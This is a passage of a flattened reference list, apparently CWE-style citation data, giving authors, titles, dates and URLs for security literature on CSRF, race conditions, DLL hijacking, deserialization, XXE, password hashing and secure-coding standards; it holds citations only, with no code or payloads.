2012 + --06 + ---11 + https://krebsonsecurity.com/2012/06/how-companies-can-beef-up-password-security/ + 2023-04-07 + + + Solar Designer + Password security: past, present, future + 2012 + https://www.openwall.com/presentations/PHDays2012-Password-Security/ + 2023-04-07 + + + Troy Hunt + Our password hashing has no clothes + 2012 + --06 + ---26 + https://www.troyhunt.com/our-password-hashing-has-no-clothes/ + 2023-04-07 + + + Joshbw + Should we really use bcrypt/scrypt? + 2012 + --06 + ---08 + https://web.archive.org/web/20120629144851/http://www.analyticalengine.net/2012/06/should-we-really-use-bcryptscrypt/ + 2023-04-07 + + + Michal Zalewski + Strange Attractors and TCP/IP Sequence Number Analysis + 2001 + https://lcamtuf.coredump.cx/oldtcp/tcpseq.html + 2023-04-07 + + + Taimur Aslam + A Taxonomy of Security Faults in the UNIX Operating System + 1995 + --08 + ---01 + http://cwe.mitre.org/documents/sources/ATaxonomyofSecurityFaultsintheUNIXOperatingSystem%5BAslam95%5D.pdf + + + Peter W + Cross-Site Request Forgeries (Re: The Dangers of Allowing Users to Post Images) + Bugtraq + http://marc.info/?l=bugtraq&m=99263135911884&w=2 + + + OWASP + Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet + http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet + + + Edward W. Felten + William Zeller + Cross-Site Request Forgeries: Exploitation and Prevention + 2008 + --10 + ---18 + https://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.147.1445 + 2023-04-07 + + + Robert Auger + CSRF - The Cross-Site Request Forgery (CSRF/XSRF) FAQ + https://www.cgisecurity.com/csrf-faq.html + 2023-04-07 + + + Cross-site request forgery + 2008 + --12 + ---22 + Wikipedia + https://en.wikipedia.org/wiki/Cross-site_request_forgery + 2023-04-07 + + + Jason Lam + Top 25 Series - Rank 4 - Cross Site Request Forgery + 2010 + --03 + ---03 + SANS Software Security Institute + http://software-security.sans.org/blog/2010/03/03/top-25-series-rank-4-cross-site-request-forgery + + + Jeff Atwood + Preventing CSRF and XSRF Attacks + 2008 + --10 + ---14 + https://blog.codinghorror.com/preventing-csrf-and-xsrf-attacks/ + 2023-04-07 + + + J. Oates + AOL man pleads guilty to selling 92m email addies + The Register + 2005 + https://www.theregister.com/2005/02/07/aol_email_theft/ + 2023-04-07 + + + NIST + Guide to Protecting the Confidentiality of Personally Identifiable Information (SP 800-122) + 2010 + --04 + https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-122.pdf + 2023-04-07 + + + U.S. Department of Commerce + Safe Harbor Privacy Framework + https://web.archive.org/web/20010223203241/http://www.export.gov/safeharbor/ + 2023-04-07 + + + Federal Trade Commission + Financial Privacy: The Gramm-Leach Bliley Act (GLBA) + https://www.ftc.gov/business-guidance/privacy-security/gramm-leach-bliley-act + 2023-04-07 + + + U.S. Department of Human Services + Health Insurance Portability and Accountability Act (HIPAA) + https://www.hhs.gov/hipaa/index.html + 2023-04-07 + + + Government of the State of California + California SB-1386 + 2002 + http://info.sen.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html + + + Andrei Alexandrescu + volatile - Multithreaded Programmer's Best Friend + Dr. Dobb's + 2008 + --02 + ---01 + https://drdobbs.com/cpp/volatile-the-multithreaded-programmers-b/184403766 + 2023-04-07 + + + Steven Devijver + Thread-safe webapps using Spring + https://web.archive.org/web/20170609174845/http://www.javalobby.org/articles/thread-safe/index.jsp + 2023-04-07 + + + David Wheeler + Prevent race conditions + 2007 + --10 + ---04 + https://www.ida.liu.se/~TDDC90/literature/papers/SP-race-conditions.pdf + 2023-04-07 + + + Matt Bishop + Race Conditions, Files, and Security Flaws; or the Tortoise and the Hare Redux + 1995 + --09 + https://seclab.cs.ucdavis.edu/projects/vulnerabilities/scriv/ucd-ecs-95-08.pdf + 2023-04-07 + + + David Wheeler + Secure Programming for Linux and Unix HOWTO + 2003 + --03 + ---03 + https://dwheeler.com/secure-programs/Secure-Programs-HOWTO/avoid-race.html + 2023-04-07 + + + Blake Watts + Discovering and Exploiting Named Pipe Security Flaws for Fun and Profit + 2002 + --04 + https://www.blakewatts.com/blog/discovering-and-exploiting-named-pipe-security-flaws-for-fun-and-profit + 2023-04-07 + + + Roberto Paleari + Davide Marrone + Danilo Bruschi + Mattia Monga + On Race Vulnerabilities in Web Applications + http://security.dico.unimi.it/~roberto/pubs/dimva08-web.pdf + + + Avoiding Race Conditions and Insecure File Operations + Apple Developer Connection + https://web.archive.org/web/20081010155022/http://developer.apple.com/documentation/Security/Conceptual/SecureCodingGuide/Articles/RaceConditions.html + 2023-04-07 + + + Johannes Ullrich + Top 25 Series - Rank 25 - Race Conditions + 2010 + --03 + ---26 + SANS Software Security Institute + https://web.archive.org/web/20100530231203/http://blogs.sans.org:80/appsecstreetfighter/2010/03/26/top-25-series-rank-25-race-conditions/ + 2023-04-07 + + + Michal Zalewski + Delivering Signals for Fun and Profit + https://lcamtuf.coredump.cx/signals.txt + 2023-04-07 + + + Race Condition: Signal Handling + https://vulncat.fortify.com/en/detail?id=desc.structural.cpp.race_condition_signal_handling#:~:text=Signal%20handling%20race%20conditions%20can,installed%20to%20handle%20multiple%20signals.s + 2023-04-07 + + + Dan Tsafrir + Tomer Hertz + David Wagner + Dilma Da Silva + Portably Solving File TOCTTOU Races with Hardness Amplification + 2008 + --02 + ---28 + https://www.usenix.org/legacy/events/fast08/tech/tsafrir.html + 2023-04-07 + + + Alex Allain + Handling Errors Exceptionally Well in C++ + https://www.cprogramming.com/tutorial/exceptions.html + 2023-04-07 + + + Microsoft + Exceptions and Exception Handling (C# Programming Guide) + https://msdn.microsoft.com/pl-pl/library/ms173160(v=vs.100).aspx + + + Tony Sintes + Does Java pass by reference or pass by value? + JavaWorld.com + 2000 + --05 + ---26 + https://web.archive.org/web/20000619025001/https://www.javaworld.com/javaworld/javaqa/2000-05/03-qa-0526-pass.html + 2023-04-07 + + + Herbert Schildt + Java: The Complete Reference, J2SE 5th Edition + + + Joao Antunes + Nuno Ferreira Neves + Paulo Verissimo + Detection and Prediction of Resource-Exhaustion Vulnerabilities + Proceedings of the IEEE International Symposium on Software Reliability Engineering (ISSRE) + 2008 + --11 + http://homepages.di.fc.ul.pt/~nuno/PAPERS/ISSRE08.pdf + + + D.J. Bernstein + Resource exhaustion + http://cr.yp.to/docs/resources.html + + + Pascal Meunier + Resource exhaustion + Secure Programming Educational Material + 2004 + http://homes.cerias.purdue.edu/~pmeunier/secprog/sanitized/class1/6.resource%20exhaustion.ppt + + + J. Whittaker + H. Thompson + How to Break Software Security + 2003 + Addison Wesley + + + iOS Developer Library + Transitioning to ARC Release Notes + 2013 + --08 + ---08 + https://developer.apple.com/library/archive/releasenotes/ObjectiveC/RN-TransitioningToARC/Introduction/Introduction.html + 2023-04-07 + + + Paul Roberts + File descriptors and setuid applications + 2007 + --02 + ---05 + https://blogs.oracle.com/paulr/entry/file_descriptors_and_setuid_applications + + + Apple + Introduction to Secure Coding Guide + https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/AccessControl.html + 2023-04-07 + + + Scott A. Crosby + Dan S. Wallach + Algorithmic Complexity Attacks + Proceedings of the 12th USENIX Security Symposium + 2003 + --08 + https://www.usenix.org/legacy/events/sec03/tech/full_papers/crosby/crosby.pdf + + + Paget + Exploiting design flaws in the Win32 API for privilege escalation. Or... Shatter Attacks - How to break Windows + 2002 + --08 + http://web.archive.org/web/20060115174629/http://security.tombom.co.uk/shatter.html + + + Georgi Guninski + Double clicking on MS Office documents from Windows Explorer may execute arbitrary programs in some cases + Bugtraq + 2000 + --09 + ---18 + https://seclists.org/bugtraq/2000/Sep/331 + 2023-01-30 + + + Mitja Kolsek + ACROS Security: Remote Binary Planting in Apple iTunes for Windows (ASPR #2010-08-18-1) + Bugtraq + 2010 + --08 + ---18 + https://lists.openwall.net/bugtraq/2010/08/18/4 + 2023-01-30 + + + Taeho Kwon + Zhendong Su + Automatic Detection of Vulnerable Dynamic Component Loadings + https://dl.acm.org/doi/10.1145/1831708.1831722 + 2023-04-07 + + + Dynamic-Link Library Search Order + 2010 + --09 + ---02 + Microsoft + https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN + 2023-04-07 + + + Dynamic-Link Library Security + 2010 + --09 + ---02 + Microsoft + https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security + 2023-04-07 + + + An update on the DLL-preloading remote attack vector + 2010 + --08 + ---31 + Microsoft + https://msrc.microsoft.com/blog/2010/08/an-update-on-the-dll-preloading-remote-attack-vector/ + 2023-04-07 + + + Insecure Library Loading Could Allow Remote Code Execution + 2010 + --08 + ---23 + Microsoft + https://learn.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637#insecure-library-loading-could-allow-remote-code-execution + 2023-04-07 + + + HD Moore + Application DLL Load Hijacking + 2010 + --08 + ---23 + https://www.rapid7.com/blog/?p=5325 + 2023-04-07 + + + Oliver Lavery + DLL Hijacking: Facts and Fiction + 2010 + --08 + ---26 + https://threatpost.com/dll-hijacking-facts-and-fiction-082610/74384/ + 2023-04-07 + + + Richard Stanway (r1CH) + Dynamic File Uploads, Security and You + https://web.archive.org/web/20090208005456/http://shsc.info/FileUploadSecurity + 2023-04-07 + + + Johannes Ullrich + 8 Basic Rules to Implement Secure File Uploads + 2009 + --12 + ---28 + https://www.sans.org/blog/8-basic-rules-to-implement-secure-file-uploads/ + 2023-04-07 + + + Johannes Ullrich + Top 25 Series - Rank 8 - Unrestricted Upload of Dangerous File Type + 2010 + --02 + ---25 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-8-unrestricted-upload-of-dangerous-file-type/ + 2023-04-07 + + + Steve Christey + On Interpretation Conflict Vulnerabilities + Bugtraq + 2005 + --11 + ---03 + https://seclists.org/bugtraq/2005/Nov/30 + 2023-04-07 + + + Thomas H. Ptacek + Timothy N. Newsham + Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection + 1998 + --01 + https://insecure.org/stf/secnet_ids/secnet_ids.pdf + 2023-04-07 + + + Brett Moore + 0x00 vs ASP file upload scripts + 2004 + --07 + ---13 + http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.pdf + + + Rain Forest Puppy + Poison NULL byte + Phrack + + + David F. Skoll + Re: Corsaire Security Advisory - Multiple vendor MIME RFC2047 encoding + Bugtraq + 2004 + --09 + ---15 + http://marc.info/?l=bugtraq&m=109525864717484&w=2 + + + Norm Hardy + The Confused Deputy (or why capabilities might have been invented) + 1988 + http://www.cap-lore.com/CapTheory/ConfusedDeputy.html + + + Chaim Linhart + Amit Klein + Ronen Heled + Steve Orrin + HTTP Request Smuggling + https://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf + 2023-04-07 + + + David Wheeler + Secure Programming for Linux and Unix HOWTO + 2003 + --03 + ---03 + http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/semantic-attacks.html + 2023-04-07 + + + mercy + Exploiting Uninitialized Data + 2006 + --01 + http://www.felinemenace.org/~mercy/papers/UBehavior/UBehavior.zip + + + Microsoft Security Vulnerability Research & Defense + MS08-014 : The Case of the Uninitialized Stack Variable Vulnerability + 2008 + --03 + ---11 + https://msrc.microsoft.com/blog/2008/03/ms08-014-the-case-of-the-uninitialized-stack-variable-vulnerability/ + 2023-04-07 + + + Robert Seacord + EXP01-A. Do not take the sizeof a pointer to determine the size of a type + https://www.securecoding.cert.org/confluence/display/seccode/EXP01-A.+Do+not+take+the+sizeof+a+pointer+to+determine+the+size+of+a+type + + + OWASP + OWASP , Attack Category : Mobile code: object hijack + http://www.owasp.org/index.php/Mobile_code:_object_hijack + + + Microsoft + Introduction to Code Signing + http://msdn.microsoft.com/en-us/library/ms537361(VS.85).aspx + + + Microsoft + Authenticode + http://msdn.microsoft.com/en-us/library/ms537359(v=VS.85).aspx + + + Apple + Code Signing Guide + Apple Developer Connection + 2008 + --11 + ---19 + https://web.archive.org/web/20080724215143/http://developer.apple.com/documentation/Security/Conceptual/CodeSigningGuide/Introduction/chapter_1_section_1.html + 2023-04-07 + + + Anthony Bellissimo + John Burgess + Kevin Fu + Secure Software Updates: Disappointments and New Challenges + http://prisms.cs.umass.edu/~kevinfu/papers/secureupdates-hotsec06.pdf + + + Johannes Ullrich + Top 25 Series - Rank 20 - Download of Code Without Integrity Check + 2010 + --04 + ---05 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-20-download-of-code-without-integrity-check/ + 2023-04-07 + + + Matthias Kaiser + Exploiting Deserialization Vulnerabilities in Java + 2015 + --10 + ---28 + https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478 + 2023-04-07 + + + Sam Thomas + PHP unserialization vulnerabilities: What are we missing? + 2015 + --08 + ---27 + https://www.slideshare.net/_s_n_t/php-unserialization-vulnerabilities-what-are-we-missing + 2023-04-07 + + + Gabriel Lawrence + Chris Frohoff + Marshalling Pickles: How deserializing objects can ruin your day + 2015 + --01 + ---28 + https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles + 2023-04-07 + + + Heine Deelstra + Unserializing user-supplied data, a bad idea + 2010 + --08 + ---25 + https://drupalsun.com/heine/2010/08/25/unserializing-user-supplied-data-bad-idea + 2023-04-07 + + + Manish S. Saindane + Black Hat EU 2010 - Attacking Java Serialized Communication + 2010 + --04 + ---26 + https://www.slideshare.net/msaindane/black-hat-eu-2010-attacking-java-serialized-communication + 2023-04-07 + + + Nadia Alramli + Why Python Pickle is Insecure + 2009 + --09 + ---09 + http://michael-rushanan.blogspot.com/2012/10/why-python-pickle-is-insecure.html + 2023-04-07 + + + Nelson Elhage + Exploiting misuse of Python's "pickle" + 2011 + --03 + ---20 + https://blog.nelhage.com/2011/03/exploiting-pickle/ + + + Chris Frohoff + Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization + 2016 + --03 + ---21 + https://speakerdeck.com/frohoff/owasp-sd-deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization + 2023-04-07 + + + Douglas C. Schmidt + Timothy H. Harrison + Nat Pryce + Thread-Specifc Storage for C/C++ + http://www.cs.wustl.edu/~schmidt/PDF/TSS-pattern.pdf + + + Intrinsic Locks and Synchronization (in Java) + https://docs.oracle.com/javase/tutorial/essential/concurrency/locksync.html + 2023-04-07 + + + Valgrind + http://valgrind.org/ + + + Zvi Gutterman + Hold Your Sessions: An Attack on Java Session-id Generation + 2005 + --02 + ---13 + https://www.microsoft.com/en-us/research/wp-content/uploads/2016/02/gm05.pdf + 2023-04-07 + + + Craig A. Shue + Andrew J. Kalafut + Minaxi Gupta + Exploitable Redirects on the Web: Identification, Prevalence, and Defense + https://www.cprogramming.com/tutorial/exceptions.html + 2023-04-07 + + + Russ McRee + Open redirect vulnerabilities: definition and prevention + Issue 17 + (IN)SECURE + 2008 + --07 + http://www.net-security.org/dl/insecure/INSECURE-Mag-17.pdf + + + Jason Lam + Top 25 Series - Rank 23 - Open Redirect + 2010 + --03 + ---25 + SANS Software Security Institute + http://software-security.sans.org/blog/2010/03/25/top-25-series-rank-23-open-redirect + + + David Bacon et al + The "Double-Checked Locking is Broken" Declaration + http://www.cs.umd.edu/~pugh/java/memoryModel/DoubleCheckedLocking.html + + + Jeremy Manson and Brian Goetz + JSR 133 (Java Memory Model) FAQ + http://www.cs.umd.edu/~pugh/java/memoryModel/jsr-133-faq.html#dcl + + + Steve Christey + Second-Order Symlink Vulnerabilities + Bugtraq + 2005 + --06 + ---07 + https://seclists.org/bugtraq/2005/Jun/44 + 2023-04-07 + + + Shaun Colley + Crafting Symlinks for Fun and Profit + Infosec Writers Text Library + 2004 + --04 + ---12 + http://www.infosecwriters.com/texts.php?op=display&id=159 + + + OWASP + XML External Entity (XXE) Processing + https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing + + + Sascha Herzog + XML External Entity Attacks (XXE) + 2010 + --10 + ---20 + https://owasp.org/www-pdf-archive/XML_Exteral_Entity_Attack.pdf + 2023-04-07 + + + Gregory Steuck + XXE (Xml eXternal Entity) Attack + https://www.beyondsecurity.com/ + 2023-04-07 + + + WASC + XML External Entities (XXE) Attack + http://projects.webappsec.org/w/page/13247003/XML%20External%20Entities + + + Bryan Sullivan + XML Denial of Service Attacks and Defenses + 2009 + --09 + https://learn.microsoft.com/en-us/archive/msdn-magazine/2009/november/xml-denial-of-service-attacks-and-defenses + 2023-04-07 + + + Chris Cornutt + Preventing XXE in PHP + https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html + 2023-04-07 + + + Shaun Clowes + A Study in Scarlet - section 5, "File Upload" + + + Microsoft + Developing Secure ActiveX Controls + 2005 + --04 + ---13 + https://learn.microsoft.com/en-us/previous-versions//ms533046(v=vs.85)?redirectedfrom=MSDN + 2023-04-07 + + + David Litchfield + The Oracle Hacker's Handbook + + + David Litchfield + Cursor Injection + http://www.davidlitchfield.com/cursor-injection.pdf + 2023-04-07 + + + Microsoft + How to stop an ActiveX control from running in Internet Explorer + https://support.microsoft.com/en-us/help/240797/how-to-stop-an-activex-control-from-running-in-internet-explorer + 2023-04-07 + + + Rain Forest Puppy + Poison NULL byte + Phrack 55 + https://insecure.org/news/P55-07.txt + 2023-04-07 + + + Brett Moore + 0x00 vs ASP file upload scripts + http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.pdf + + + ShAnKaR + ShAnKaR: multiple PHP application poison NULL byte vulnerability + https://seclists.org/fulldisclosure/2006/Sep/185 + 2023-04-07 + + + Steve Christey + Dynamic Evaluation Vulnerabilities in PHP applications + Full-Disclosure + 2006 + --05 + ---03 + https://seclists.org/fulldisclosure/2006/May/35 + 2023-04-07 + + + Shaun Clowes + A Study In Scarlet: Exploiting Common Vulnerabilities in PHP Applications + https://securereality.com.au/study-in-scarlett/ + 2023-04-07 + + + Sean Barnum + Michael Gegick + Failing Securely + 2005 + --12 + ---05 + https://web.archive.org/web/20221017053210/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/failing-securely + 2023-04-07 + + + Sean Barnum + Michael Gegick + Economy of Mechanism + 2005 + --09 + ---13 + https://web.archive.org/web/20220126060058/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/economy-of-mechanism + 2023-04-07 + + + Sean Barnum + Michael Gegick + Complete Mediation + 2005 + --09 + ---12 + https://web.archive.org/web/20221006191503/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/complete-mediation + 2023-04-07 + + + OWASP + Top 10 2007-Insecure Direct Object Reference + 2007 + http://www.owasp.org/index.php/Top_10_2007-A4 + + + HMAC + 2011 + --08 + ---18 + Wikipedia + https://en.wikipedia.org/wiki/HMAC + 2023-04-07 + + + Web Application Security Consortium + XPath Injection + http://projects.webappsec.org/w/page/13247005/XPath%20Injection + 2023-04-07 + + + Sean Barnum + Michael Gegick + Separation of Privilege + 2005 + --12 + ---06 + https://web.archive.org/web/20220126060047/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/separation-of-privilege + 2023-04-07 + + + Sean Barnum + Michael Gegick + Psychological Acceptability + 2005 + --09 + ---15 + https://web.archive.org/web/20221104163022/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/psychological-acceptability + 2023-04-07 + + + J. D. Tygar + Alma Whitten + Usability of Security: A Case Study + SCS Technical Report Collection, CMU-CS-98-155 + 1998 + --12 + ---15 + http://reports-archive.adm.cs.cmu.edu/anon/1998/CMU-CS-98-155.pdf + + + Jon Postel, Editor + RFC: 793, TRANSMISSION CONTROL PROTOCOL + 1981 + --09 + Information Sciences Institute + https://www.ietf.org/rfc/rfc0793.txt + 2023-04-07 + + + Sean Barnum + Michael Gegick + Never Assuming that Your Secrets Are Safe + 2005 + --09 + ---14 + https://web.archive.org/web/20220126060054/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/never-assuming-that-your-secrets-are-safe + 2023-04-07 + + + Sean Barnum + Michael Gegick + Design Principles + 2005 + --09 + ---19 + https://web.archive.org/web/20220126060046/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/design-principles + 2023-04-07 + + + SUN + Java Concurrency API + https://docs.oracle.com/javase/1.5.0/docs/api/java/util/concurrent/locks/ReentrantLock.html + 2023-04-07 + + + Dipak Jha, Software Engineer, IBM + Use reentrant functions for safer signal handling + https://archive.ph/rl1XR + 2023-04-07 + + + Michael Howard + Security Development Lifecycle (SDL) Banned Function Calls + https://learn.microsoft.com/en-us/previous-versions/bb288454(v=msdn.10)?redirectedfrom=MSDN + 2023-04-07 + + + Don Parker + Windows NTFS Alternate Data Streams + 2005 + --02 + ---16 + https://seclists.org/basics/2005/Feb/312 + 2023-04-07 + + + Adam Doupé + Bryce Boe + Christopher Kruegel + Giovanni Vigna + Fear the EAR: Discovering and Mitigating Execution After Redirect Vulnerabilities + http://cs.ucsb.edu/~bboe/public/pubs/fear-the-ear-ccs2011.pdf + + + Taimur Aslam + A Taxonomy of Security Faults in the UNIX Operating System + 1995 + --08 + ---01 + http://ftp.cerias.purdue.edu/pub/papers/taimur-aslam/aslam-taxonomy-msthesis.pdf + + + Taimur Aslam + Ivan Krsul + Eugene H. Spafford + Use of A Taxonomy of Security Faults + 1995 + --08 + ---01 + https://csrc.nist.gov/csrc/media/publications/conference-paper/1996/10/22/proceedings-of-the-19th-nissc-1996/documents/paper057/paper.pdf + 2023-04-07 + + + Top 10 2004 + 2004 + --01 + ---27 + OWASP + http://www.owasp.org/index.php/Top_10_2004 + + + PCI Security Standards Council + About the PCI Data Security Standard (PCI DSS) + https://listings.pcisecuritystandards.org/pci_security/ + 2023-04-07 + + + OWASP + Top 10 2007-Cross Site Scripting + 2007 + http://www.owasp.org/index.php/Top_10_2007-A1 + + + OWASP + Top 10 2007-Cross Site Request Forgery + 2007 + http://www.owasp.org/index.php/Top_10_2007-A5 + + + OWASP + Top 10 2007-Information Leakage and Improper Error Handling + 2007 + http://www.owasp.org/index.php/Top_10_2007-A6 + + + OWASP + Top 10 2007-Insecure Cryptographic Storage + 2007 + http://www.owasp.org/index.php/Top_10_2007-A8 + + + NetSec + NetSec Security Advisory: Multiple Vulnerabilities Resulting From Use Of Apple OSX HFS+ + BugTraq + 2005 + --02 + ---16 + https://seclists.org/bugtraq/2005/Feb/309 + 2023-04-07 + + + OWASP + Top 10 2007-Failure to Restrict URL Access + 2007 + http://www.owasp.org/index.php/Top_10_2007-A10 + + + OWASP + A1 Unvalidated Input + 2007 + http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 + + + OWASP + A2 Broken Access Control + 2007 + http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 + + + OWASP + A3 Broken Authentication and Session Management + 2007 + http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 + + + OWASP + A4 Cross-Site Scripting (XSS) Flaws + 2007 + http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 + + + OWASP + A5 Buffer Overflows + 2007 + http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 + + + OWASP + A6 Injection Flaws + 2007 + http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 + + + OWASP + A7 Improper Error Handling + 2007 + http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 + + + OWASP + A8 Insecure Storage + 2007 + http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 + + + OWASP + A9 Denial of Service + 2007 + http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 + + + OWASP + A10 Insecure Configuration Management + 2007 + http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 + + + Jason Lam + Top 25 Series - Rank 21 - Incorrect Permission Assignment for Critical Response + 2010 + --03 + ---24 + SANS Software Security Institute + http://software-security.sans.org/blog/2010/03/24/top-25-series-rank-21-incorrect-permission-assignment-for-critical-response + + + Robert C. Seacord + The CERT C Secure Coding Standard + 1st Edition + 2008 + --10 + ---14 + Addison-Wesley Professional + + + The Software Engineering Institute + SEI CERT C Coding Standard + https://wiki.sei.cmu.edu/confluence/display/c/SEI+CERT+C+Coding+Standard + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 01. Preprocessor (PRE) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152276 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 02. Declarations and Initialization (DCL) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152215 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 03. Expressions (EXP) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152200 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 04. Integers (INT) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152052 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 05. Floating Point (FLP) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152181 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 06. Arrays (ARR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152051 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 07. Characters and Strings (STR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152038 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 08. Memory Management (MEM) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152142 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 09. Input Output (FIO) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152270 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 10. Environment (ENV) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152421 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 11. Signals (SIG) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152469 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 12. Error Handling (ERR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152345 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 13. Application Programming Interfaces (API) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152242 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 14. Concurrency (CON) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152257 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 48. Miscellaneous (MSC) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152201 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 50. POSIX (POS) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152405 + + + 2009 CWE/SANS Top 25 Most Dangerous Programming Errors + 2009 + --01 + ---12 + http://cwe.mitre.org/top25/archive/2009/2009_cwe_sans_top25.html + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rule 51. Microsoft Windows (WIN) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151925 + + + Frank Kim + Top 25 Series - Rank 15 - Improper Check for Unusual or Exceptional Conditions + 2010 + --03 + ---15 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-15-improper-check-for-unusual-or-exceptional-conditions/ + 2023-04-07 + + + OWASP + Password Storage Cheat Sheet + https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html + 2023-04-07 + + + Thomas Ptacek + Enough With The Rainbow Tables: What You Need To Know About Secure Password Schemes + 2007 + --09 + ---10 + http://hashphp.org/hashing.html + 2023-04-07 + + + Robert Graham + The Importance of Being Canonical + 2009 + --02 + ---02 + https://blog.erratasec.com/2009/02/importance-of-being-canonical.html#.ZCbyY7LMJPY + 2023-04-07 + + + James McGlinn + Password Hashing + https://privacyaustralia.net/phpsec/articles/password-hashing/ + 2023-04-07 + + + Jeff Atwood + Rainbow Hash Cracking + 2007 + --09 + ---08 + https://blog.codinghorror.com/rainbow-hash-cracking/ + 2023-04-07 + + + Jeff Atwood + Speed Hashing + 2012 + --04 + ---06 + https://blog.codinghorror.com/speed-hashing/ + 2023-04-07 + + + Rainbow table + 2009 + --03 + ---03 + Wikipedia + https://en.wikipedia.org/wiki/Rainbow_table + 2023-04-07 + + + boost C++ Library Smart Pointers + https://www.boost.org/doc/libs/1_38_0/libs/smart_ptr/smart_ptr.htm + 2023-04-07 + + + getrlimit(2) - Linux manual page + https://man7.org/linux/man-pages/man2/setrlimit.2.html + 2023-04-07 + + + Rafal Los + Real-Life Example of a 'Business Logic Defect' (Screen Shots!) + 2011 + http://h30501.www3.hp.com/t5/Following-the-White-Rabbit-A/Real-Life-Example-of-a-Business-Logic-Defect-Screen-Shots/ba-p/22581 + + + Frank Kim + Top 25 Series - Rank 22 - Allocation of Resources Without Limits or Throttling + 2010 + --03 + ---23 + SANS Software Security Institute + https://web.archive.org/web/20170113055136/https://software-security.sans.org/blog/2010/03/23/top-25-series-rank-22-allocation-of-resources-without-limits-or-throttling/ + 2023-04-07 + + + Amit Klein + Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD + 2002 + --12 + ---16 + https://seclists.org/fulldisclosure/2002/Dec/229 + 2023-04-07 + + + Rami Jaamour + XML security: Preventing XML bombs + 2006 + --02 + ---22 + http://searchsoftwarequality.techtarget.com/expert/KnowledgebaseAnswer/0,289625,sid92_gci1168442,00.html?asrc=SS_CLA_302%20%20558&psrc=CLT_92# + + + Didier Stevens + Dismantling an XML-Bomb + 2008 + --09 + ---23 + https://blog.didierstevens.com/2008/09/23/dismantling-an-xml-bomb/ + 2023-04-07 + + + Robert Auger + XML Entity Expansion 